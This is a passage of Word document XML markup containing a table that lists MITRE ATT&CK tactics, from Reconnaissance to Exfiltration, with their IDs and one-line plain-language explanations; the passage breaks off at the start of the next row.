          <w:p w14:paraId="352C1900" w14:textId="77777777" w:rsidR="00D60AEC" w:rsidRPr="00D60AEC" w:rsidRDefault="00D60AEC" w:rsidP="00D60AEC">
            <w:pPr>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00D60AEC">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>Tactic Name</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="77C7D7AF" w14:textId="77777777" w:rsidR="00D60AEC" w:rsidRPr="00D60AEC" w:rsidRDefault="00D60AEC" w:rsidP="00D60AEC">
            <w:pPr>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00D60AEC">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>MITRE ID</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="48AA47BD" w14:textId="77777777" w:rsidR="00D60AEC" w:rsidRPr="00D60AEC" w:rsidRDefault="00D60AEC" w:rsidP="00D60AEC">
            <w:pPr>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00D60AEC">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>Simple Explanation</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00D60AEC" w:rsidRPr="00D60AEC" w14:paraId="6905A7B5" w14:textId="77777777" w:rsidTr="00D60AEC">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="53C7EF04" w14:textId="77777777" w:rsidR="00D60AEC" w:rsidRPr="00D60AEC" w:rsidRDefault="00D60AEC" w:rsidP="00D60AEC">
            <w:r w:rsidRPr="00D60AEC">
              <w:t>1</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="38294219" w14:textId="77777777" w:rsidR="00D60AEC" w:rsidRPr="00D60AEC" w:rsidRDefault="00D60AEC" w:rsidP="00D60AEC">
            <w:r w:rsidRPr="00D60AEC">
              <w:t>Reconnaissance</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="21D9842A" w14:textId="77777777" w:rsidR="00D60AEC" w:rsidRPr="00D60AEC" w:rsidRDefault="00D60AEC" w:rsidP="00D60AEC">
            <w:r w:rsidRPr="00D60AEC">
              <w:t>TA0043</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="30AFF2E2" w14:textId="77777777" w:rsidR="00D60AEC" w:rsidRPr="00D60AEC" w:rsidRDefault="00D60AEC" w:rsidP="00D60AEC">
            <w:r w:rsidRPr="00D60AEC">
              <w:t>Attacker gathers info before launching the attack</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00D60AEC" w:rsidRPr="00D60AEC" w14:paraId="440FFCEA" w14:textId="77777777" w:rsidTr="00D60AEC">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="18FFC244" w14:textId="77777777" w:rsidR="00D60AEC" w:rsidRPr="00D60AEC" w:rsidRDefault="00D60AEC" w:rsidP="00D60AEC">
            <w:r w:rsidRPr="00D60AEC">
              <w:t>2</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="26CC79AE" w14:textId="77777777" w:rsidR="00D60AEC" w:rsidRPr="00D60AEC" w:rsidRDefault="00D60AEC" w:rsidP="00D60AEC">
            <w:r w:rsidRPr="00D60AEC">
              <w:t>Resource Development</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="0D64CCEC" w14:textId="77777777" w:rsidR="00D60AEC" w:rsidRPr="00D60AEC" w:rsidRDefault="00D60AEC" w:rsidP="00D60AEC">
            <w:r w:rsidRPr="00D60AEC">
              <w:t>TA0042</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="6F1642DD" w14:textId="77777777" w:rsidR="00D60AEC" w:rsidRPr="00D60AEC" w:rsidRDefault="00D60AEC" w:rsidP="00D60AEC">
            <w:r w:rsidRPr="00D60AEC">
              <w:t>Attacker prepares tools, domains, and accounts</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00D60AEC" w:rsidRPr="00D60AEC" w14:paraId="07D51688" w14:textId="77777777" w:rsidTr="00D60AEC">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="346674C0" w14:textId="77777777" w:rsidR="00D60AEC" w:rsidRPr="00D60AEC" w:rsidRDefault="00D60AEC" w:rsidP="00D60AEC">
            <w:r w:rsidRPr="00D60AEC">
              <w:t>3</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="5999B820" w14:textId="77777777" w:rsidR="00D60AEC" w:rsidRPr="00D60AEC" w:rsidRDefault="00D60AEC" w:rsidP="00D60AEC">
            <w:r w:rsidRPr="00D60AEC">
              <w:t>Initial Access</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="79397D50" w14:textId="77777777" w:rsidR="00D60AEC" w:rsidRPr="00D60AEC" w:rsidRDefault="00D60AEC" w:rsidP="00D60AEC">
            <w:r w:rsidRPr="00D60AEC">
              <w:t>TA0001</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="2D89502A" w14:textId="77777777" w:rsidR="00D60AEC" w:rsidRPr="00D60AEC" w:rsidRDefault="00D60AEC" w:rsidP="00D60AEC">
            <w:r w:rsidRPr="00D60AEC">
              <w:t>First entry into a system (e.g., phishing)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00D60AEC" w:rsidRPr="00D60AEC" w14:paraId="3DBFD752" w14:textId="77777777" w:rsidTr="00D60AEC">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="14CE0686" w14:textId="77777777" w:rsidR="00D60AEC" w:rsidRPr="00D60AEC" w:rsidRDefault="00D60AEC" w:rsidP="00D60AEC">
            <w:r w:rsidRPr="00D60AEC">
              <w:t>4</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="3EDCEF1D" w14:textId="77777777" w:rsidR="00D60AEC" w:rsidRPr="00D60AEC" w:rsidRDefault="00D60AEC" w:rsidP="00D60AEC">
            <w:r w:rsidRPr="00D60AEC">
              <w:t>Execution</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="3CCDFA5C" w14:textId="77777777" w:rsidR="00D60AEC" w:rsidRPr="00D60AEC" w:rsidRDefault="00D60AEC" w:rsidP="00D60AEC">
            <w:r w:rsidRPr="00D60AEC">
              <w:t>TA0002</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="450A788F" w14:textId="77777777" w:rsidR="00D60AEC" w:rsidRPr="00D60AEC" w:rsidRDefault="00D60AEC" w:rsidP="00D60AEC">
            <w:r w:rsidRPr="00D60AEC">
              <w:t>Run malicious code or scripts on target</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00D60AEC" w:rsidRPr="00D60AEC" w14:paraId="607EF295" w14:textId="77777777" w:rsidTr="00D60AEC">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="03B448AC" w14:textId="77777777" w:rsidR="00D60AEC" w:rsidRPr="00D60AEC" w:rsidRDefault="00D60AEC" w:rsidP="00D60AEC">
            <w:r w:rsidRPr="00D60AEC">
              <w:t>5</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="3654A6D5" w14:textId="77777777" w:rsidR="00D60AEC" w:rsidRPr="00D60AEC" w:rsidRDefault="00D60AEC" w:rsidP="00D60AEC">
            <w:r w:rsidRPr="00D60AEC">
              <w:t>Persistence</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="689103A1" w14:textId="77777777" w:rsidR="00D60AEC" w:rsidRPr="00D60AEC" w:rsidRDefault="00D60AEC" w:rsidP="00D60AEC">
            <w:r w:rsidRPr="00D60AEC">
              <w:t>TA0003</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="1E4537EB" w14:textId="77777777" w:rsidR="00D60AEC" w:rsidRPr="00D60AEC" w:rsidRDefault="00D60AEC" w:rsidP="00D60AEC">
            <w:r w:rsidRPr="00D60AEC">
              <w:t>Stay inside the system after reboot/login</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00D60AEC" w:rsidRPr="00D60AEC" w14:paraId="4BC05535" w14:textId="77777777" w:rsidTr="00D60AEC">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="012D3186" w14:textId="77777777" w:rsidR="00D60AEC" w:rsidRPr="00D60AEC" w:rsidRDefault="00D60AEC" w:rsidP="00D60AEC">
            <w:r w:rsidRPr="00D60AEC">
              <w:t>6</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="3DD18AAA" w14:textId="77777777" w:rsidR="00D60AEC" w:rsidRPr="00D60AEC" w:rsidRDefault="00D60AEC" w:rsidP="00D60AEC">
            <w:r w:rsidRPr="00D60AEC">
              <w:t>Privilege Escalation</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="2AC18350" w14:textId="77777777" w:rsidR="00D60AEC" w:rsidRPr="00D60AEC" w:rsidRDefault="00D60AEC" w:rsidP="00D60AEC">
            <w:r w:rsidRPr="00D60AEC">
              <w:t>TA0004</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="5CD7540D" w14:textId="77777777" w:rsidR="00D60AEC" w:rsidRPr="00D60AEC" w:rsidRDefault="00D60AEC" w:rsidP="00D60AEC">
            <w:r w:rsidRPr="00D60AEC">
              <w:t>Gain higher-level (admin/root) access</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00D60AEC" w:rsidRPr="00D60AEC" w14:paraId="143A3E43" w14:textId="77777777" w:rsidTr="00D60AEC">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="2C91ADF8" w14:textId="77777777" w:rsidR="00D60AEC" w:rsidRPr="00D60AEC" w:rsidRDefault="00D60AEC" w:rsidP="00D60AEC">
            <w:r w:rsidRPr="00D60AEC">
              <w:t>7</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="6BCBC328" w14:textId="6AF5DE21" w:rsidR="00D60AEC" w:rsidRPr="00D60AEC" w:rsidRDefault="00D60AEC" w:rsidP="00D60AEC">
            <w:r w:rsidRPr="00D60AEC">
              <w:t>Defen</w:t>
            </w:r>
            <w:r w:rsidR="001D5AD4">
              <w:t>c</w:t>
            </w:r>
            <w:r w:rsidRPr="00D60AEC">
              <w:t>e Evasion</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="030ABAFD" w14:textId="77777777" w:rsidR="00D60AEC" w:rsidRPr="00D60AEC" w:rsidRDefault="00D60AEC" w:rsidP="00D60AEC">
            <w:r w:rsidRPr="00D60AEC">
              <w:t>TA0005</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="4DB42D4A" w14:textId="77777777" w:rsidR="00D60AEC" w:rsidRPr="00D60AEC" w:rsidRDefault="00D60AEC" w:rsidP="00D60AEC">
            <w:r w:rsidRPr="00D60AEC">
              <w:t>Avoid detection by antivirus/firewalls</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00D60AEC" w:rsidRPr="00D60AEC" w14:paraId="27FE1AB0" w14:textId="77777777" w:rsidTr="00D60AEC">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="19735AAC" w14:textId="77777777" w:rsidR="00D60AEC" w:rsidRPr="00D60AEC" w:rsidRDefault="00D60AEC" w:rsidP="00D60AEC">
            <w:r w:rsidRPr="00D60AEC">
              <w:t>8</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="796A3326" w14:textId="77777777" w:rsidR="00D60AEC" w:rsidRPr="00D60AEC" w:rsidRDefault="00D60AEC" w:rsidP="00D60AEC">
            <w:r w:rsidRPr="00D60AEC">
              <w:t>Credential Access</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="7A39419F" w14:textId="77777777" w:rsidR="00D60AEC" w:rsidRPr="00D60AEC" w:rsidRDefault="00D60AEC" w:rsidP="00D60AEC">
            <w:r w:rsidRPr="00D60AEC">
              <w:t>TA0006</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="019764AE" w14:textId="77777777" w:rsidR="00D60AEC" w:rsidRPr="00D60AEC" w:rsidRDefault="00D60AEC" w:rsidP="00D60AEC">
            <w:r w:rsidRPr="00D60AEC">
              <w:t>Steal passwords, tokens, credentials</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00D60AEC" w:rsidRPr="00D60AEC" w14:paraId="44393603" w14:textId="77777777" w:rsidTr="00D60AEC">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="5A52A39C" w14:textId="77777777" w:rsidR="00D60AEC" w:rsidRPr="00D60AEC" w:rsidRDefault="00D60AEC" w:rsidP="00D60AEC">
            <w:r w:rsidRPr="00D60AEC">
              <w:t>9</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="2F5B7C90" w14:textId="77777777" w:rsidR="00D60AEC" w:rsidRPr="00D60AEC" w:rsidRDefault="00D60AEC" w:rsidP="00D60AEC">
            <w:r w:rsidRPr="00D60AEC">
              <w:t>Discovery</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="63C67D39" w14:textId="77777777" w:rsidR="00D60AEC" w:rsidRPr="00D60AEC" w:rsidRDefault="00D60AEC" w:rsidP="00D60AEC">
            <w:r w:rsidRPr="00D60AEC">
              <w:t>TA0007</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="50BED689" w14:textId="77777777" w:rsidR="00D60AEC" w:rsidRPr="00D60AEC" w:rsidRDefault="00D60AEC" w:rsidP="00D60AEC">
            <w:r w:rsidRPr="00D60AEC">
              <w:t>Explore system, users, and network details</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00D60AEC" w:rsidRPr="00D60AEC" w14:paraId="20ECF8F4" w14:textId="77777777" w:rsidTr="00D60AEC">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="61D9EEAC" w14:textId="77777777" w:rsidR="00D60AEC" w:rsidRPr="00D60AEC" w:rsidRDefault="00D60AEC" w:rsidP="00D60AEC">
            <w:r w:rsidRPr="00D60AEC">
              <w:t>10</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="00A637AC" w14:textId="77777777" w:rsidR="00D60AEC" w:rsidRPr="00D60AEC" w:rsidRDefault="00D60AEC" w:rsidP="00D60AEC">
            <w:r w:rsidRPr="00D60AEC">
              <w:t>Lateral Movement</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="03B26647" w14:textId="77777777" w:rsidR="00D60AEC" w:rsidRPr="00D60AEC" w:rsidRDefault="00D60AEC" w:rsidP="00D60AEC">
            <w:r w:rsidRPr="00D60AEC">
              <w:t>TA0008</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="6E0A6C63" w14:textId="77777777" w:rsidR="00D60AEC" w:rsidRPr="00D60AEC" w:rsidRDefault="00D60AEC" w:rsidP="00D60AEC">
            <w:r w:rsidRPr="00D60AEC">
              <w:t>Move to other systems inside the network</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00D60AEC" w:rsidRPr="00D60AEC" w14:paraId="30291F4A" w14:textId="77777777" w:rsidTr="00D60AEC">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="3E175AEB" w14:textId="77777777" w:rsidR="00D60AEC" w:rsidRPr="00D60AEC" w:rsidRDefault="00D60AEC" w:rsidP="00D60AEC">
            <w:r w:rsidRPr="00D60AEC">
              <w:t>11</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="2107BEA4" w14:textId="77777777" w:rsidR="00D60AEC" w:rsidRPr="00D60AEC" w:rsidRDefault="00D60AEC" w:rsidP="00D60AEC">
            <w:r w:rsidRPr="00D60AEC">
              <w:t>Collection</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="4129682E" w14:textId="77777777" w:rsidR="00D60AEC" w:rsidRPr="00D60AEC" w:rsidRDefault="00D60AEC" w:rsidP="00D60AEC">
            <w:r w:rsidRPr="00D60AEC">
              <w:t>TA0009</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="6C8E74F0" w14:textId="77777777" w:rsidR="00D60AEC" w:rsidRPr="00D60AEC" w:rsidRDefault="00D60AEC" w:rsidP="00D60AEC">
            <w:r w:rsidRPr="00D60AEC">
              <w:t>Gather data to steal (files, screenshots)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00D60AEC" w:rsidRPr="00D60AEC" w14:paraId="60E62F16" w14:textId="77777777" w:rsidTr="00D60AEC">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="34A2165A" w14:textId="77777777" w:rsidR="00D60AEC" w:rsidRPr="00D60AEC" w:rsidRDefault="00D60AEC" w:rsidP="00D60AEC">
            <w:r w:rsidRPr="00D60AEC">
              <w:t>12</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="49404493" w14:textId="77777777" w:rsidR="00D60AEC" w:rsidRPr="00D60AEC" w:rsidRDefault="00D60AEC" w:rsidP="00D60AEC">
            <w:r w:rsidRPr="00D60AEC">
              <w:t>Command &amp; Control</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="419398FD" w14:textId="77777777" w:rsidR="00D60AEC" w:rsidRPr="00D60AEC" w:rsidRDefault="00D60AEC" w:rsidP="00D60AEC">
            <w:r w:rsidRPr="00D60AEC">
              <w:t>TA0011</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="5660F6BA" w14:textId="77777777" w:rsidR="00D60AEC" w:rsidRPr="00D60AEC" w:rsidRDefault="00D60AEC" w:rsidP="00D60AEC">
            <w:r w:rsidRPr="00D60AEC">
              <w:t>Communicate with attacker’s server</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00D60AEC" w:rsidRPr="00D60AEC" w14:paraId="6A729D68" w14:textId="77777777" w:rsidTr="00D60AEC">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="79A93FF2" w14:textId="77777777" w:rsidR="00D60AEC" w:rsidRPr="00D60AEC" w:rsidRDefault="00D60AEC" w:rsidP="00D60AEC">
            <w:r w:rsidRPr="00D60AEC">
              <w:t>13</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="6D0728C3" w14:textId="77777777" w:rsidR="00D60AEC" w:rsidRPr="00D60AEC" w:rsidRDefault="00D60AEC" w:rsidP="00D60AEC">
            <w:r w:rsidRPr="00D60AEC">
              <w:t>Exfiltration</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="46B3B8CD" w14:textId="77777777" w:rsidR="00D60AEC" w:rsidRPr="00D60AEC" w:rsidRDefault="00D60AEC" w:rsidP="00D60AEC">
            <w:r w:rsidRPr="00D60AEC">
              <w:t>TA0010</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="77C562F7" w14:textId="77777777" w:rsidR="00D60AEC" w:rsidRPr="00D60AEC" w:rsidRDefault="00D60AEC" w:rsidP="00D60AEC">
            <w:r w:rsidRPr="00D60AEC">
              <w:t>Send stolen data out of the network</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00D60AEC" w:rsidRPr="00D60AEC" w14:paraId="2219DAEC" w14:textId="77777777" w:rsidTr="00D60AEC">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="4A0D8C67" w14:textId="77777777" w:rsidR="00D60AEC" w:rsidRPr="00D60AEC" w:rsidRDefault="00D60AEC" w:rsidP="00D60AEC">
